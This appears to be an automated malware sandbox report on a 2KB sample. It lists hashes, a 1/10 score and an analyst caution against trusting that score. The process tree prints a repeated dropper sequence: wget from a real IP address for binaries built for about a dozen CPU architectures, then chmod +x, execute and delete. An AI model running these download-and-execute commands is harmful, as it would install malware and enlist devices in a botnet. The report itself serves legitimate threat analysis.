Analysis

  • max time kernel
    17s
  • max time network
    19s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240226-en
  • resource tags

    arch:armhf image:debian9-armhf-20240226-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
  • submitted
    11/03/2024, 17:27

General

  • Target

    c12d6a5b59b7ee9d5900b1cd05bd4cf7

  • Size

    2KB

  • MD5

    c12d6a5b59b7ee9d5900b1cd05bd4cf7

  • SHA1

    550e280ff928b1fcdbeb739eb51d5bbd4483632a

  • SHA256

    d6bb7d6aea2ad9cbd0fefea9352e0f3b789f022f0df451801e9f6d64c1cb2aec

  • SHA512

    ae8f1edd24daa7df3bdc9df16600bfeb6e8df1102831f8ac206dd877762ee55fa5a1e7c9a5661fffba31b312b306b1c571dcd8cb328d88e63285773658fac87d

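Score
1/10

Note: this is the sandbox's automated score for a 17s run on an armhf guest, and the Signatures section on this page is empty. The process tree below still records a download, chmod +x, execute, delete sequence repeated per CPU architecture against a single host, so the low score should not be read as a benign verdict without manual triage.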

Malware Config

Signatures

Processes

  • /tmp/c12d6a5b59b7ee9d5900b1cd05bd4cf7
    /tmp/c12d6a5b59b7ee9d5900b1cd05bd4cf7
    1⤵
      PID:643
      • /usr/bin/wget
        wget http://167.99.91.177/Execution.mips
        2⤵
          PID:645
        • /bin/chmod
          chmod +x Execution.mips
          2⤵
            PID:654
          • /tmp/Execution.mips
            ./Execution.mips
            2⤵
              PID:656
            • /bin/rm
              rm -rf Execution.mips
              2⤵
                PID:657
              • /usr/bin/wget
                wget http://167.99.91.177/Execution.mpsl
                2⤵
                  PID:660
                • /bin/chmod
                  chmod +x Execution.mpsl
                  2⤵
                    PID:675
                  • /tmp/Execution.mpsl
                    ./Execution.mpsl
                    2⤵
                      PID:676
                    • /bin/rm
                      rm -rf Execution.mpsl
                      2⤵
                        PID:677
                      • /usr/bin/wget
                        wget http://167.99.91.177/Execution.sh4
                        2⤵
                          PID:678
                        • /bin/chmod
                          chmod +x Execution.sh4
                          2⤵
                            PID:682
                          • /tmp/Execution.sh4
                            ./Execution.sh4
                            2⤵
                              PID:683
                            • /bin/rm
                              rm -rf Execution.sh4
                              2⤵
                                PID:684
                              • /usr/bin/wget
                                wget http://167.99.91.177/Execution.x86
                                2⤵
                                  PID:685
                                • /bin/chmod
                                  chmod +x Execution.x86
                                  2⤵
                                    PID:686
                                  • /tmp/Execution.x86
                                    ./Execution.x86
                                    2⤵
                                      PID:687
                                    • /bin/rm
                                      rm -rf Execution.x86
                                      2⤵
                                        PID:688
                                      • /usr/bin/wget
                                        wget http://167.99.91.177/Execution.arm6
                                        2⤵
                                          PID:689
                                        • /bin/chmod
                                          chmod +x Execution.arm6
                                          2⤵
                                            PID:693
                                          • /tmp/Execution.arm6
                                            ./Execution.arm6
                                            2⤵
                                              PID:694
                                            • /bin/rm
                                              rm -rf Execution.arm6
                                              2⤵
                                                PID:695
                                              • /usr/bin/wget
                                                wget http://167.99.91.177/Execution.i686
                                                2⤵
                                                  PID:697
                                                • /bin/chmod
                                                  chmod +x Execution.i686
                                                  2⤵
                                                    PID:699
                                                  • /tmp/Execution.i686
                                                    ./Execution.i686
                                                    2⤵
                                                      PID:701
                                                    • /bin/rm
                                                      rm -rf Execution.i686
                                                      2⤵
                                                        PID:702
                                                      • /usr/bin/wget
                                                        wget http://167.99.91.177/Execution.ppc
                                                        2⤵
                                                          PID:703
                                                        • /bin/chmod
                                                          chmod +x Execution.ppc
                                                          2⤵
                                                            PID:729
                                                          • /tmp/Execution.ppc
                                                            ./Execution.ppc
                                                            2⤵
                                                              PID:731
                                                            • /bin/rm
                                                              rm -rf Execution.ppc
                                                              2⤵
                                                                PID:732
                                                              • /usr/bin/wget
                                                                wget http://167.99.91.177/Execution.i586
                                                                2⤵
                                                                  PID:733
                                                                • /bin/chmod
                                                                  chmod +x Execution.i586
                                                                  2⤵
                                                                    PID:736
                                                                  • /tmp/Execution.i586
                                                                    ./Execution.i586
                                                                    2⤵
                                                                      PID:739
                                                                    • /bin/rm
                                                                      rm -rf Execution.i586
                                                                      2⤵
                                                                        PID:740
                                                                      • /usr/bin/wget
                                                                        wget http://167.99.91.177/Execution.m68k
                                                                        2⤵
                                                                          PID:742
                                                                        • /bin/chmod
                                                                          chmod +x Execution.m68k
                                                                          2⤵
                                                                            PID:744
                                                                          • /tmp/Execution.m68k
                                                                            ./Execution.m68k
                                                                            2⤵
                                                                              PID:746
                                                                            • /bin/rm
                                                                              rm -rf Execution.m68k
                                                                              2⤵
                                                                                PID:747
                                                                              • /usr/bin/wget
                                                                                wget http://167.99.91.177/Execution.sparc
                                                                                2⤵
                                                                                  PID:748
                                                                                • /bin/chmod
                                                                                  chmod +x Execution.sparc
                                                                                  2⤵
                                                                                    PID:751
                                                                                  • /tmp/Execution.sparc
                                                                                    ./Execution.sparc
                                                                                    2⤵
                                                                                      PID:752
                                                                                    • /bin/rm
                                                                                      rm -rf Execution.sparc
                                                                                      2⤵
                                                                                        PID:753
                                                                                      • /usr/bin/wget
                                                                                        wget http://167.99.91.177/Execution.arm4
                                                                                        2⤵
                                                                                          PID:755
                                                                                        • /bin/chmod
                                                                                          chmod +x Execution.arm4
                                                                                          2⤵
                                                                                            PID:758
                                                                                          • /tmp/Execution.arm4
                                                                                            ./Execution.arm4
                                                                                            2⤵
                                                                                              PID:759
                                                                                            • /bin/rm
                                                                                              rm -rf Execution.arm4
                                                                                              2⤵
                                                                                                PID:760
                                                                                              • /usr/bin/wget
                                                                                                wget http://167.99.91.177/Execution.arm5
                                                                                                2⤵
                                                                                                  PID:761
                                                                                                • /bin/chmod
                                                                                                  chmod +x Execution.arm5
                                                                                                  2⤵
                                                                                                    PID:763
                                                                                                  • /tmp/Execution.arm5
                                                                                                    ./Execution.arm5
                                                                                                    2⤵
                                                                                                      PID:764
                                                                                                    • /bin/rm
                                                                                                      rm -rf Execution.arm5
                                                                                                      2⤵
                                                                                                        PID:765
                                                                                                      • /usr/bin/wget
                                                                                                        wget http://167.99.91.177/Execution.arm7
                                                                                                        2⤵
                                                                                                          PID:766
                                                                                                        • /bin/chmod
                                                                                                          chmod +x Execution.arm7
                                                                                                          2⤵
                                                                                                            PID:767
                                                                                                          • /tmp/Execution.arm7
                                                                                                            ./Execution.arm7
                                                                                                            2⤵
                                                                                                              PID:768
                                                                                                            • /bin/rm
                                                                                                              rm -rf Execution.arm7
                                                                                                              2⤵
                                                                                                                PID:769
                                                                                                              • /usr/bin/wget
                                                                                                                wget http://167.99.91.177/Execution.ppc
                                                                                                                2⤵
                                                                                                                  PID:770
                                                                                                                • /bin/chmod
                                                                                                                  chmod +x Execution.ppc
                                                                                                                  2⤵
                                                                                                                    PID:771
                                                                                                                  • /tmp/Execution.ppc
                                                                                                                    ./Execution.ppc
                                                                                                                    2⤵
                                                                                                                      PID:772
                                                                                                                    • /bin/rm
                                                                                                                      rm -rf Execution.ppc
                                                                                                                      2⤵
                                                                                                                        PID:773

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Matrix


                                                                                                                    Downloads